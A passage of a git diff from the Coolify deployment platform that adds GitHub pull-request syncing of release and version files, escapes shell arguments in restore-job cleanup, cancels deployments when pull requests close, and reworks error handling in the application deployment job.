'update-releases-and-versions-'.$timestamp; + $versionsTargetPath = $nightly ? 'json/versions-nightly.json' : 'json/versions.json'; + + // 3. Clone the repository + $this->info('Cloning coolify-cdn repository...'); + $output = []; + exec('gh repo clone coollabsio/coolify-cdn '.escapeshellarg($tmpDir).' 2>&1', $output, $returnCode); + if ($returnCode !== 0) { + $this->error('Failed to clone repository: '.implode("\n", $output)); + + return false; + } + + // 4. Create feature branch + $this->info('Creating feature branch...'); + $output = []; + exec('cd '.escapeshellarg($tmpDir).' && git checkout -b '.escapeshellarg($branchName).' 2>&1', $output, $returnCode); + if ($returnCode !== 0) { + $this->error('Failed to create branch: '.implode("\n", $output)); + exec('rm -rf '.escapeshellarg($tmpDir)); + + return false; + } + + // 5. Write releases.json + $this->info('Writing releases.json...'); + $releasesPath = "$tmpDir/json/releases.json"; + $releasesDir = dirname($releasesPath); + + if (! is_dir($releasesDir)) { + if (! mkdir($releasesDir, 0755, true)) { + $this->error("Failed to create directory: $releasesDir"); + exec('rm -rf '.escapeshellarg($tmpDir)); + + return false; + } + } + + $releasesJsonContent = json_encode($releases, JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES); + if (file_put_contents($releasesPath, $releasesJsonContent) === false) { + $this->error("Failed to write releases.json to: $releasesPath"); + exec('rm -rf '.escapeshellarg($tmpDir)); + + return false; + } + + // 6. Write versions.json + $this->info('Writing versions.json...'); + $versionsPath = "$tmpDir/$versionsTargetPath"; + $versionsDir = dirname($versionsPath); + + if (! is_dir($versionsDir)) { + if (! mkdir($versionsDir, 0755, true)) { + $this->error("Failed to create directory: $versionsDir"); + exec('rm -rf '.escapeshellarg($tmpDir)); + + return false; + } + } + + $versionsJsonContent = json_encode($versionsJson, JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES); + if (file_put_contents($versionsPath, $versionsJsonContent) === false) { + $this->error("Failed to write versions.json to: $versionsPath"); + exec('rm -rf '.escapeshellarg($tmpDir)); + + return false; + } + + // 7. Stage both files + $this->info('Staging changes...'); + $output = []; + exec('cd '.escapeshellarg($tmpDir).' && git add json/releases.json '.escapeshellarg($versionsTargetPath).' 2>&1', $output, $returnCode); + if ($returnCode !== 0) { + $this->error('Failed to stage changes: '.implode("\n", $output)); + exec('rm -rf '.escapeshellarg($tmpDir)); + + return false; + } + + // 8. Check for changes + $this->info('Checking for changes...'); + $statusOutput = []; + exec('cd '.escapeshellarg($tmpDir).' && git status --porcelain 2>&1', $statusOutput, $returnCode); + if ($returnCode !== 0) { + $this->error('Failed to check repository status: '.implode("\n", $statusOutput)); + exec('rm -rf '.escapeshellarg($tmpDir)); + + return false; + } + + if (empty(array_filter($statusOutput))) { + $this->info('Both files are already up to date. No changes to commit.'); + exec('rm -rf '.escapeshellarg($tmpDir)); + + return true; + } + + // 9. Commit changes + $envLabel = $nightly ? 'NIGHTLY' : 'PRODUCTION'; + $commitMessage = "Update releases.json and $envLabel versions.json to $actualVersion - ".date('Y-m-d H:i:s'); + $output = []; + exec('cd '.escapeshellarg($tmpDir).' && git commit -m '.escapeshellarg($commitMessage).' 2>&1', $output, $returnCode); + if ($returnCode !== 0) { + $this->error('Failed to commit changes: '.implode("\n", $output)); + exec('rm -rf '.escapeshellarg($tmpDir)); + + return false; + } + + // 10. Push to remote + $this->info('Pushing branch to remote...'); + $output = []; + exec('cd '.escapeshellarg($tmpDir).' && git push origin '.escapeshellarg($branchName).' 2>&1', $output, $returnCode); + if ($returnCode !== 0) { + $this->error('Failed to push branch: '.implode("\n", $output)); + exec('rm -rf '.escapeshellarg($tmpDir)); + + return false; + } + + // 11. Create pull request + $this->info('Creating pull request...'); + $prTitle = "Update releases.json and $envLabel versions.json to $actualVersion - ".date('Y-m-d H:i:s'); + $prBody = "Automated update:\n- releases.json with latest ".count($releases)." releases from GitHub API\n- $envLabel versions.json to version $actualVersion"; + $prCommand = 'gh pr create --repo coollabsio/coolify-cdn --title '.escapeshellarg($prTitle).' --body '.escapeshellarg($prBody).' --base main --head '.escapeshellarg($branchName).' 2>&1'; + $output = []; + exec($prCommand, $output, $returnCode); + + // 12. Clean up + exec('rm -rf '.escapeshellarg($tmpDir)); + + if ($returnCode !== 0) { + $this->error('Failed to create PR: '.implode("\n", $output)); + + return false; + } + + $this->info('Pull request created successfully!'); + if (! empty($output)) { + $this->info('PR URL: '.implode("\n", $output)); + } + $this->info("Version synced: $actualVersion"); + $this->info('Total releases synced: '.count($releases)); + + return true; + } catch (\Throwable $e) { + $this->error('Error syncing to GitHub: '.$e->getMessage()); + + return false; + } + } + + /** + * Sync versions.json to GitHub repository via PR + */ + private function syncVersionsToGitHubRepo(string $versionsLocation, bool $nightly = false): bool + { + $this->info('Syncing versions.json to GitHub repository...'); + try { + if (! file_exists($versionsLocation)) { + $this->error("versions.json not found at: $versionsLocation"); + + return false; + } + + $file = file_get_contents($versionsLocation); + $json = json_decode($file, true); + $actualVersion = data_get($json, 'coolify.v4.version'); + + $timestamp = time(); + $tmpDir = sys_get_temp_dir().'/coolify-cdn-versions-'.$timestamp; + $branchName = 'update-versions-'.$timestamp; + $targetPath = $nightly ? 'json/versions-nightly.json' : 'json/versions.json'; + + // Clone the repository + $this->info('Cloning coolify-cdn repository...'); + exec('gh repo clone coollabsio/coolify-cdn '.escapeshellarg($tmpDir).' 2>&1', $output, $returnCode); + if ($returnCode !== 0) { + $this->error('Failed to clone repository: '.implode("\n", $output)); + + return false; + } + + // Create feature branch + $this->info('Creating feature branch...'); + $output = []; + exec('cd '.escapeshellarg($tmpDir).' && git checkout -b '.escapeshellarg($branchName).' 2>&1', $output, $returnCode); + if ($returnCode !== 0) { + $this->error('Failed to create branch: '.implode("\n", $output)); + exec('rm -rf '.escapeshellarg($tmpDir)); + + return false; + } + + // Write versions.json + $this->info('Writing versions.json...'); + $versionsPath = "$tmpDir/$targetPath"; + $versionsDir = dirname($versionsPath); + + // Ensure directory exists + if (! is_dir($versionsDir)) { + $this->info("Creating directory: $versionsDir"); + if (! mkdir($versionsDir, 0755, true)) { + $this->error("Failed to create directory: $versionsDir"); + exec('rm -rf '.escapeshellarg($tmpDir)); + + return false; + } + } + + $jsonContent = json_encode($json, JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES); + $bytesWritten = file_put_contents($versionsPath, $jsonContent); + + if ($bytesWritten === false) { + $this->error("Failed to write versions.json to: $versionsPath"); + $this->error('Possible reasons: permission denied or disk full.'); + exec('rm -rf '.escapeshellarg($tmpDir)); + + return false; + } + + // Stage and commit + $this->info('Committing changes...'); + $output = []; + exec('cd '.escapeshellarg($tmpDir).' && git add '.escapeshellarg($targetPath).' 2>&1', $output, $returnCode); + if ($returnCode !== 0) { + $this->error('Failed to stage changes: '.implode("\n", $output)); + exec('rm -rf '.escapeshellarg($tmpDir)); + + return false; + } + + $this->info('Checking for changes...'); + $statusOutput = []; + exec('cd '.escapeshellarg($tmpDir).' && git status --porcelain '.escapeshellarg($targetPath).' 2>&1', $statusOutput, $returnCode); + if ($returnCode !== 0) { + $this->error('Failed to check repository status: '.implode("\n", $statusOutput)); + exec('rm -rf '.escapeshellarg($tmpDir)); + + return false; + } + + if (empty(array_filter($statusOutput))) { + $this->info('versions.json is already up to date. No changes to commit.'); + exec('rm -rf '.escapeshellarg($tmpDir)); + + return true; + } + + $envLabel = $nightly ? 'NIGHTLY' : 'PRODUCTION'; + $commitMessage = "Update $envLabel versions.json to $actualVersion - ".date('Y-m-d H:i:s'); + $output = []; + exec('cd '.escapeshellarg($tmpDir).' && git commit -m '.escapeshellarg($commitMessage).' 2>&1', $output, $returnCode); + if ($returnCode !== 0) { + $this->error('Failed to commit changes: '.implode("\n", $output)); + exec('rm -rf '.escapeshellarg($tmpDir)); + + return false; + } + + // Push to remote + $this->info('Pushing branch to remote...'); + $output = []; + exec('cd '.escapeshellarg($tmpDir).' && git push origin '.escapeshellarg($branchName).' 2>&1', $output, $returnCode); + if ($returnCode !== 0) { + $this->error('Failed to push branch: '.implode("\n", $output)); + exec('rm -rf '.escapeshellarg($tmpDir)); + + return false; + } + + // Create pull request + $this->info('Creating pull request...'); + $prTitle = "Update $envLabel versions.json to $actualVersion - ".date('Y-m-d H:i:s'); + $prBody = "Automated update of $envLabel versions.json to version $actualVersion"; + $output = []; + $prCommand = 'gh pr create --repo coollabsio/coolify-cdn --title '.escapeshellarg($prTitle).' --body '.escapeshellarg($prBody).' --base main --head '.escapeshellarg($branchName).' 2>&1'; + exec($prCommand, $output, $returnCode); + + // Clean up + exec('rm -rf '.escapeshellarg($tmpDir)); + + if ($returnCode !== 0) { + $this->error('Failed to create PR: '.implode("\n", $output)); + + return false; + } + + $this->info('Pull request created successfully!'); + if (! empty($output)) { + $this->info('PR URL: '.implode("\n", $output)); + } + $this->info("Version synced: $actualVersion"); + + return true; + } catch (\Throwable $e) { + $this->error('Error syncing versions.json: '.$e->getMessage()); + + return false; + } + } + /** * Execute the console command. */ @@ -167,6 +522,7 @@ public function handle() $only_template = $this->option('templates'); $only_version = $this->option('release'); $only_github_releases = $this->option('github-releases'); + $only_github_versions = $this->option('github-versions'); $nightly = $this->option('nightly'); $bunny_cdn = 'https://cdn.coollabs.io'; $bunny_cdn_path = 'coolify'; @@ -224,7 +580,7 @@ public function handle() $install_script_location = "$parent_dir/other/nightly/$install_script"; $versions_location = "$parent_dir/other/nightly/$versions"; } - if (! $only_template && ! $only_version && ! $only_github_releases) { + if (! $only_template && ! $only_version && ! $only_github_releases && ! $only_github_versions) { if ($nightly) { $this->info('About to sync files NIGHTLY (docker-compose.prod.yaml, upgrade.sh, install.sh, etc) to BunnyCDN.'); } else { @@ -250,25 +606,47 @@ public function handle() return; } elseif ($only_version) { if ($nightly) { - $this->info('About to sync NIGHLTY versions.json to BunnyCDN.'); + $this->info('About to sync NIGHTLY versions.json to BunnyCDN and create GitHub PR.'); } else { - $this->info('About to sync PRODUCTION versions.json to BunnyCDN.'); + $this->info('About to sync PRODUCTION versions.json to BunnyCDN and create GitHub PR.'); } $file = file_get_contents($versions_location); $json = json_decode($file, true); $actual_version = data_get($json, 'coolify.v4.version'); - $confirmed = confirm("Are you sure you want to sync to {$actual_version}?"); + $this->info("Version: {$actual_version}"); + $this->info('This will:'); + $this->info(' 1. Sync versions.json to BunnyCDN (deprecated but still supported)'); + $this->info(' 2. Create ONE GitHub PR with both releases.json and versions.json'); + $this->newLine(); + + $confirmed = confirm('Are you sure you want to proceed?'); if (! $confirmed) { return; } - // Sync versions.json to BunnyCDN + // 1. Sync versions.json to BunnyCDN (deprecated but still needed) + $this->info('Step 1/2: Syncing versions.json to BunnyCDN...'); Http::pool(fn (Pool $pool) => [ $pool->storage(fileName: $versions_location)->put("/$bunny_cdn_storage_name/$bunny_cdn_path/$versions"), $pool->purge("$bunny_cdn/$bunny_cdn_path/$versions"), ]); - $this->info('versions.json uploaded & purged...'); + $this->info('✓ versions.json uploaded & purged to BunnyCDN'); + $this->newLine(); + + // 2. Create GitHub PR with both releases.json and versions.json + $this->info('Step 2/2: Creating GitHub PR with releases.json and versions.json...'); + $githubSuccess = $this->syncReleasesAndVersionsToGitHubRepo($versions_location, $nightly); + if ($githubSuccess) { + $this->info('✓ GitHub PR created successfully with both files'); + } else { + $this->error('✗ Failed to create GitHub PR'); + } + $this->newLine(); + + $this->info('=== Summary ==='); + $this->info('BunnyCDN sync: ✓ Complete'); + $this->info('GitHub PR: '.($githubSuccess ? '✓ Created (releases.json + versions.json)' : '✗ Failed')); return; } elseif ($only_github_releases) { @@ -281,6 +659,22 @@ public function handle() // Sync releases to GitHub repository $this->syncReleasesToGitHubRepo(); + return; + } elseif ($only_github_versions) { + $envLabel = $nightly ? 'NIGHTLY' : 'PRODUCTION'; + $file = file_get_contents($versions_location); + $json = json_decode($file, true); + $actual_version = data_get($json, 'coolify.v4.version'); + + $this->info("About to sync $envLabel versions.json ($actual_version) to GitHub repository."); + $confirmed = confirm('Are you sure you want to sync versions.json via GitHub PR?'); + if (! $confirmed) { + return; + } + + // Sync versions.json to GitHub repository + $this->syncVersionsToGitHubRepo($versions_location, $nightly); + return; } diff --git a/app/Console/Kernel.php b/app/Console/Kernel.php index c2ea27274..832bed5ae 100644 --- a/app/Console/Kernel.php +++ b/app/Console/Kernel.php @@ -5,6 +5,7 @@ use App\Jobs\CheckAndStartSentinelJob; use App\Jobs\CheckForUpdatesJob; use App\Jobs\CheckHelperImageJob; +use App\Jobs\CheckTraefikVersionJob; use App\Jobs\CleanupInstanceStuffsJob; use App\Jobs\PullChangelog; use App\Jobs\PullTemplatesFromCDN; @@ -83,6 +84,8 @@ protected function schedule(Schedule $schedule): void $this->scheduleInstance->job(new RegenerateSslCertJob)->twiceDaily(); + $this->scheduleInstance->job(new CheckTraefikVersionJob)->weekly()->sundays()->at('00:00')->timezone($this->instanceTimezone)->onOneServer(); + $this->scheduleInstance->command('cleanup:database --yes')->daily(); $this->scheduleInstance->command('uploads:clear')->everyTwoMinutes(); } diff --git a/app/Data/ServerMetadata.php b/app/Data/ServerMetadata.php index d95944b15..cdd9c8c08 100644 --- a/app/Data/ServerMetadata.php +++ b/app/Data/ServerMetadata.php @@ -10,6 +10,8 @@ class ServerMetadata extends Data { public function __construct( public ?ProxyTypes $type, - public ?ProxyStatus $status + public ?ProxyStatus $status, + public ?string $last_saved_settings = null, + public ?string $last_applied_settings = null ) {} } diff --git a/app/Events/RestoreJobFinished.php b/app/Events/RestoreJobFinished.php index d3adb7798..8690e01f6 100644 --- a/app/Events/RestoreJobFinished.php +++ b/app/Events/RestoreJobFinished.php @@ -17,17 +17,23 @@ public function __construct($data) $tmpPath = data_get($data, 'tmpPath'); $container = data_get($data, 'container'); $serverId = data_get($data, 'serverId'); - if (filled($scriptPath) && filled($tmpPath) && filled($container) && filled($serverId)) { - if (str($tmpPath)->startsWith('/tmp/') - && str($scriptPath)->startsWith('/tmp/') - && ! str($tmpPath)->contains('..') - && ! str($scriptPath)->contains('..') - && strlen($tmpPath) > 5 // longer than just "/tmp/" - && strlen($scriptPath) > 5 - ) { - $commands[] = "docker exec {$container} sh -c 'rm {$scriptPath}'"; - $commands[] = "docker exec {$container} sh -c 'rm {$tmpPath}'"; - instant_remote_process($commands, Server::find($serverId), throwError: true); + + if (filled($container) && filled($serverId)) { + $commands = []; + + if (isSafeTmpPath($scriptPath)) { + $commands[] = 'docker exec '.escapeshellarg($container)." sh -c 'rm ".escapeshellarg($scriptPath)." 2>/dev/null || true'"; + } + + if (isSafeTmpPath($tmpPath)) { + $commands[] = 'docker exec '.escapeshellarg($container)." sh -c 'rm ".escapeshellarg($tmpPath)." 2>/dev/null || true'"; + } + + if (! empty($commands)) { + $server = Server::find($serverId); + if ($server) { + instant_remote_process($commands, $server, throwError: false); + } } } } diff --git a/app/Events/S3RestoreJobFinished.php b/app/Events/S3RestoreJobFinished.php new file mode 100644 index 000000000..e1f844558 --- /dev/null +++ b/app/Events/S3RestoreJobFinished.php @@ -0,0 +1,56 @@ +/dev/null || true'; + } + + // Clean up server temp file if still exists (should already be cleaned) + if (isSafeTmpPath($serverTmpPath)) { + $commands[] = 'rm -f '.escapeshellarg($serverTmpPath).' 2>/dev/null || true'; + } + + // Clean up any remaining files in database container (may already be cleaned) + if (filled($container)) { + if (isSafeTmpPath($containerTmpPath)) { + $commands[] = 'docker exec '.escapeshellarg($container).' rm -f '.escapeshellarg($containerTmpPath).' 2>/dev/null || true'; + } + if (isSafeTmpPath($scriptPath)) { + $commands[] = 'docker exec '.escapeshellarg($container).' rm -f '.escapeshellarg($scriptPath).' 2>/dev/null || true'; + } + } + + if (! empty($commands)) { + $server = Server::find($serverId); + if ($server) { + instant_remote_process($commands, $server, throwError: false); + } + } + } + } +} diff --git a/app/Exceptions/DeploymentException.php b/app/Exceptions/DeploymentException.php new file mode 100644 index 000000000..01e0a8235 --- /dev/null +++ b/app/Exceptions/DeploymentException.php @@ -0,0 +1,32 @@ +getMessage(), $exception->getCode(), $exception); + } +} diff --git a/app/Exceptions/Handler.php b/app/Exceptions/Handler.php index 3d731223d..71de48bcd 100644 --- a/app/Exceptions/Handler.php +++ b/app/Exceptions/Handler.php @@ -30,6 +30,7 @@ class Handler extends ExceptionHandler protected $dontReport = [ ProcessException::class, NonReportableException::class, + DeploymentException::class, ]; /** diff --git a/app/Http/Controllers/Api/ServicesController.php b/app/Http/Controllers/Api/ServicesController.php index 2c4d0d361..469d8b550 100644 --- a/app/Http/Controllers/Api/ServicesController.php +++ b/app/Http/Controllers/Api/ServicesController.php @@ -351,7 +351,7 @@ public function create_service(Request $request) 'destination_id' => $destination->id, 'destination_type' => $destination->getMorphClass(), ]; - if ($oneClickServiceName === 'cloudflared') { + if ($oneClickServiceName === 'pgadmin') { data_set($servicePayload, 'connect_to_docker_network', true); } $service = Service::create($servicePayload); diff --git a/app/Http/Controllers/Webhook/Github.php b/app/Http/Controllers/Webhook/Github.php index 5ba9c08e7..a1fcaa7f5 100644 --- a/app/Http/Controllers/Webhook/Github.php +++ b/app/Http/Controllers/Webhook/Github.php @@ -246,6 +246,40 @@ public function manual(Request $request) if ($action === 'closed') { $found = ApplicationPreview::where('application_id', $application->id)->where('pull_request_id', $pull_request_id)->first(); if ($found) { + // Cancel any active deployments for this PR immediately + $activeDeployment = \App\Models\ApplicationDeploymentQueue::where('application_id', $application->id) + ->where('pull_request_id', $pull_request_id) + ->whereIn('status', [ + \App\Enums\ApplicationDeploymentStatus::QUEUED->value, + \App\Enums\ApplicationDeploymentStatus::IN_PROGRESS->value, + ]) + ->first(); + + if ($activeDeployment) { + try { + // Mark deployment as cancelled + $activeDeployment->update([ + 'status' => \App\Enums\ApplicationDeploymentStatus::CANCELLED_BY_USER->value, + ]); + + // Add cancellation log entry + $activeDeployment->addLogEntry('Deployment cancelled: Pull request closed.', 'stderr'); + + // Check if helper container exists and kill it + $deployment_uuid = $activeDeployment->deployment_uuid; + $server = $application->destination->server; + $checkCommand = "docker ps -a --filter name={$deployment_uuid} --format '{{.Names}}'"; + $containerExists = instant_remote_process([$checkCommand], $server); + + if ($containerExists && str($containerExists)->trim()->isNotEmpty()) { + instant_remote_process(["docker rm -f {$deployment_uuid}"], $server); + $activeDeployment->addLogEntry('Deployment container stopped.'); + } + } catch (\Throwable $e) { + // Silently handle errors during deployment cancellation + } + } + DeleteResourceJob::dispatch($found); $return_payloads->push([ 'application' => $application->name, @@ -481,6 +515,42 @@ public function normal(Request $request) if ($action === 'closed' || $action === 'close') { $found = ApplicationPreview::where('application_id', $application->id)->where('pull_request_id', $pull_request_id)->first(); if ($found) { + // Cancel any active deployments for this PR immediately + $activeDeployment = \App\Models\ApplicationDeploymentQueue::where('application_id', $application->id) + ->where('pull_request_id', $pull_request_id) + ->whereIn('status', [ + \App\Enums\ApplicationDeploymentStatus::QUEUED->value, + \App\Enums\ApplicationDeploymentStatus::IN_PROGRESS->value, + ]) + ->first(); + + if ($activeDeployment) { + try { + // Mark deployment as cancelled + $activeDeployment->update([ + 'status' => \App\Enums\ApplicationDeploymentStatus::CANCELLED_BY_USER->value, + ]); + + // Add cancellation log entry + $activeDeployment->addLogEntry('Deployment cancelled: Pull request closed.', 'stderr'); + + // Check if helper container exists and kill it + $deployment_uuid = $activeDeployment->deployment_uuid; + $server = $application->destination->server; + $checkCommand = "docker ps -a --filter name={$deployment_uuid} --format '{{.Names}}'"; + $containerExists = instant_remote_process([$checkCommand], $server); + + if ($containerExists && str($containerExists)->trim()->isNotEmpty()) { + instant_remote_process(["docker rm -f {$deployment_uuid}"], $server); + $activeDeployment->addLogEntry('Deployment container stopped.'); + } + + } catch (\Throwable $e) { + // Silently handle errors during deployment cancellation + } + } + + // Clean up any deployed containers $containers = getCurrentApplicationContainerStatus($application->destination->server, $application->id, $pull_request_id); if ($containers->isNotEmpty()) { $containers->each(function ($container) use ($application) { diff --git a/app/Jobs/ApplicationDeploymentJob.php b/app/Jobs/ApplicationDeploymentJob.php index 13511d1b1..7fafc58f1 100644 --- a/app/Jobs/ApplicationDeploymentJob.php +++ b/app/Jobs/ApplicationDeploymentJob.php @@ -7,6 +7,7 @@ use App\Enums\ProcessStatus; use App\Events\ApplicationConfigurationChanged; use App\Events\ServiceStatusChanged; +use App\Exceptions\DeploymentException; use App\Models\Application; use App\Models\ApplicationDeploymentQueue; use App\Models\ApplicationPreview; @@ -31,7 +32,6 @@ use Illuminate\Support\Collection; use Illuminate\Support\Sleep; use Illuminate\Support\Str; -use RuntimeException; use Spatie\Url\Url; use Symfony\Component\Yaml\Yaml; use Throwable; @@ -41,6 +41,12 @@ class ApplicationDeploymentJob implements ShouldBeEncrypted, ShouldQueue { use Dispatchable, EnvironmentVariableAnalyzer, ExecuteRemoteCommand, InteractsWithQueue, Queueable, SerializesModels; + public const BUILD_TIME_ENV_PATH = '/artifacts/build-time.env'; + + private const BUILD_SCRIPT_PATH = '/artifacts/build.sh'; + + private const NIXPACKS_PLAN_PATH = '/artifacts/thegameplan.json'; + public $tries = 1; public $timeout = 3600; @@ -341,20 +347,42 @@ public function handle(): void $this->fail($e); throw $e; } finally { - $this->application_deployment_queue->update([ - 'finished_at' => Carbon::now()->toImmutable(), - ]); - - if ($this->use_build_server) { - $this->server = $this->build_server; - } else { - $this->write_deployment_configurations(); + // Wrap cleanup operations in try-catch to prevent exceptions from interfering + // with Laravel's job failure handling and status updates + try { + $this->application_deployment_queue->update([ + 'finished_at' => Carbon::now()->toImmutable(), + ]); + } catch (Exception $e) { + // Log but don't fail - finished_at is not critical + \Log::warning('Failed to update finished_at for deployment '.$this->deployment_uuid.': '.$e->getMessage()); } - $this->application_deployment_queue->addLogEntry("Gracefully shutting down build container: {$this->deployment_uuid}"); - $this->graceful_shutdown_container($this->deployment_uuid); + try { + if ($this->use_build_server) { + $this->server = $this->build_server; + } else { + $this->write_deployment_configurations(); + } + } catch (Exception $e) { + // Log but don't fail - configuration writing errors shouldn't prevent status updates + $this->application_deployment_queue->addLogEntry('Warning: Failed to write deployment configurations: '.$e->getMessage(), 'stderr'); + } - ServiceStatusChanged::dispatch(data_get($this->application, 'environment.project.team.id')); + try { + $this->application_deployment_queue->addLogEntry("Gracefully shutting down build container: {$this->deployment_uuid}"); + $this->graceful_shutdown_container($this->deployment_uuid); + } catch (Exception $e) { + // Log but don't fail - container cleanup errors are expected when container is already gone + \Log::warning('Failed to shutdown container '.$this->deployment_uuid.': '.$e->getMessage()); + } + + try { + ServiceStatusChanged::dispatch(data_get($this->application, 'environment.project.team.id')); + } catch (Exception $e) { + // Log but don't fail - event dispatch errors shouldn't prevent status updates + \Log::warning('Failed to dispatch ServiceStatusChanged for deployment '.$this->deployment_uuid.': '.$e->getMessage()); + } } } @@ -630,11 +658,27 @@ private function deploy_docker_compose_buildpack() $this->save_buildtime_environment_variables(); if ($this->docker_compose_custom_build_command) { + // Auto-inject -f (compose file) and --env-file flags using helper function + $build_command = injectDockerComposeFlags( + $this->docker_compose_custom_build_command, + "{$this->workdir}{$this->docker_compose_location}", + self::BUILD_TIME_ENV_PATH + ); + // Prepend DOCKER_BUILDKIT=1 if BuildKit is supported - $build_command = $this->docker_compose_custom_build_command; if ($this->dockerBuildkitSupported) { $build_command = "DOCKER_BUILDKIT=1 {$build_command}"; } + + // Append build arguments if not using build secrets (matching default behavior) + if (! $this->application->settings->use_build_secrets && $this->build_args instanceof \Illuminate\Support\Collection && $this->build_args->isNotEmpty()) { + $build_args_string = $this->build_args->implode(' '); + // Escape single quotes for bash -c context used by executeInDocker + $build_args_string = str_replace("'", "'\\''", $build_args_string); + $build_command .= " {$build_args_string}"; + $this->application_deployment_queue->addLogEntry('Adding build arguments to custom Docker Compose build command.'); + } + $this->execute_remote_command( [executeInDocker($this->deployment_uuid, "cd {$this->basedir} && {$build_command}"), 'hidden' => true], ); @@ -645,7 +689,7 @@ private function deploy_docker_compose_buildpack() $command = "DOCKER_BUILDKIT=1 {$command}"; } // Use build-time .env file from /artifacts (outside Docker context to prevent it from being in the image) - $command .= ' --env-file /artifacts/build-time.env'; + $command .= ' --env-file '.self::BUILD_TIME_ENV_PATH; if ($this->force_rebuild) { $command .= " --project-name {$this->application->uuid} --project-directory {$this->workdir} -f {$this->workdir}{$this->docker_compose_location} build --pull --no-cache"; } else { @@ -693,9 +737,16 @@ private function deploy_docker_compose_buildpack() $server_workdir = $this->application->workdir(); if ($this->application->settings->is_raw_compose_deployment_enabled) { if ($this->docker_compose_custom_start_command) { + // Auto-inject -f (compose file) and --env-file flags using helper function + $start_command = injectDockerComposeFlags( + $this->docker_compose_custom_start_command, + "{$server_workdir}{$this->docker_compose_location}", + "{$server_workdir}/.env" + ); + $this->write_deployment_configurations(); $this->execute_remote_command( - [executeInDocker($this->deployment_uuid, "cd {$this->workdir} && {$this->docker_compose_custom_start_command}"), 'hidden' => true], + [executeInDocker($this->deployment_uuid, "cd {$this->workdir} && {$start_command}"), 'hidden' => true], ); } else { $this->write_deployment_configurations(); @@ -711,9 +762,18 @@ private function deploy_docker_compose_buildpack() } } else { if ($this->docker_compose_custom_start_command) { + // Auto-inject -f (compose file) and --env-file flags using helper function + // Use $this->workdir for non-preserve-repository mode + $workdir_path = $this->preserveRepository ? $server_workdir : $this->workdir; + $start_command = injectDockerComposeFlags( + $this->docker_compose_custom_start_command, + "{$workdir_path}{$this->docker_compose_location}", + "{$workdir_path}/.env" + ); + $this->write_deployment_configurations(); $this->execute_remote_command( - [executeInDocker($this->deployment_uuid, "cd {$this->basedir} && {$this->docker_compose_custom_start_command}"), 'hidden' => true], + [executeInDocker($this->deployment_uuid, "cd {$this->basedir} && {$start_command}"), 'hidden' => true], ); } else { $command = "{$this->coolify_variables} docker compose"; @@ -954,7 +1014,7 @@ private function push_to_docker_registry() } catch (Exception $e) { $this->application_deployment_queue->addLogEntry('Failed to push image to docker registry. Please check debug logs for more information.'); if ($forceFail) { - throw new RuntimeException($e->getMessage(), 69420); + throw new DeploymentException(get_class($e).': '.$e->getMessage(), $e->getCode(), $e); } } } @@ -1146,6 +1206,18 @@ private function generate_runtime_environment_variables() foreach ($runtime_environment_variables as $env) { $envs->push($env->key.'='.$env->real_value); } + + // Check for PORT environment variable mismatch with ports_exposes + if ($this->build_pack !== 'dockercompose') { + $detectedPort = $this->application->detectPortFromEnvironment(false); + if ($detectedPort && ! empty($ports) && ! in_array($detectedPort, $ports)) { + $this->application_deployment_queue->addLogEntry( + "Warning: PORT environment variable ({$detectedPort}) does not match configured ports_exposes: ".implode(',', $ports).'. It could case "bad gateway" or "no server" errors. Check the "General" page to fix it.', + 'stderr' + ); + } + } + // Add PORT if not exists, use the first port as default if ($this->build_pack !== 'dockercompose') { if ($this->application->environment_variables->where('key', 'PORT')->isEmpty()) { @@ -1291,7 +1363,7 @@ private function save_runtime_environment_variables() $envs_base64 = base64_encode($environment_variables->implode("\n")); // Write .env file to workdir (for container runtime) - $this->application_deployment_queue->addLogEntry('Creating .env file with runtime variables for build phase.', hidden: true); + $this->application_deployment_queue->addLogEntry('Creating .env file with runtime variables for container.', hidden: true); $this->execute_remote_command( [ executeInDocker($this->deployment_uuid, "echo '$envs_base64' | base64 -d | tee $this->workdir/.env > /dev/null"), @@ -1330,7 +1402,7 @@ private function generate_buildtime_environment_variables() } $envs = collect([]); - $coolify_envs = $this->generate_coolify_env_variables(); + $coolify_envs = $this->generate_coolify_env_variables(forBuildTime: true); // Add COOLIFY variables $coolify_envs->each(function ($item, $key) use ($envs) { @@ -1500,10 +1572,10 @@ private function save_buildtime_environment_variables() $this->execute_remote_command( [ - executeInDocker($this->deployment_uuid, "echo '$envs_base64' | base64 -d | tee /artifacts/build-time.env > /dev/null"), + executeInDocker($this->deployment_uuid, "echo '$envs_base64' | base64 -d | tee ".self::BUILD_TIME_ENV_PATH.' > /dev/null'), ], [ - executeInDocker($this->deployment_uuid, 'cat /artifacts/build-time.env'), + executeInDocker($this->deployment_uuid, 'cat '.self::BUILD_TIME_ENV_PATH), 'hidden' => true, ], ); @@ -1514,7 +1586,7 @@ private function save_buildtime_environment_variables() $this->execute_remote_command( [ - executeInDocker($this->deployment_uuid, 'touch /artifacts/build-time.env'), + executeInDocker($this->deployment_uuid, 'touch '.self::BUILD_TIME_ENV_PATH), ] ); } @@ -1576,123 +1648,131 @@ private function laravel_finetunes() private function rolling_update() { - $this->checkForCancellation(); - if ($this->server->isSwarm()) { - $this->application_deployment_queue->addLogEntry('Rolling update started.'); - $this->execute_remote_command( - [ - executeInDocker($this->deployment_uuid, "docker stack deploy --detach=true --with-registry-auth -c {$this->workdir}{$this->docker_compose_location} {$this->application->uuid}"), - ], - ); - $this->application_deployment_queue->addLogEntry('Rolling update completed.'); - } else { - if ($this->use_build_server) { - $this->write_deployment_configurations(); - $this->server = $this->original_server; - } - if (count($this->application->ports_mappings_array) > 0 || (bool) $this->application->settings->is_consistent_container_name_enabled || str($this->application->settings->custom_internal_name)->isNotEmpty() || $this->pull_request_id !== 0 || str($this->application->custom_docker_run_options)->contains('--ip') || str($this->application->custom_docker_run_options)->contains('--ip6')) { - $this->application_deployment_queue->addLogEntry('----------------------------------------'); - if (count($this->application->ports_mappings_array) > 0) { - $this->application_deployment_queue->addLogEntry('Application has ports mapped to the host system, rolling update is not supported.'); - } - if ((bool) $this->application->settings->is_consistent_container_name_enabled) { - $this->application_deployment_queue->addLogEntry('Consistent container name feature enabled, rolling update is not supported.'); - } - if (str($this->application->settings->custom_internal_name)->isNotEmpty()) { - $this->application_deployment_queue->addLogEntry('Custom internal name is set, rolling update is not supported.'); - } - if ($this->pull_request_id !== 0) { - $this->application->settings->is_consistent_container_name_enabled = true; - $this->application_deployment_queue->addLogEntry('Pull request deployment, rolling update is not supported.'); - } - if (str($this->application->custom_docker_run_options)->contains('--ip') || 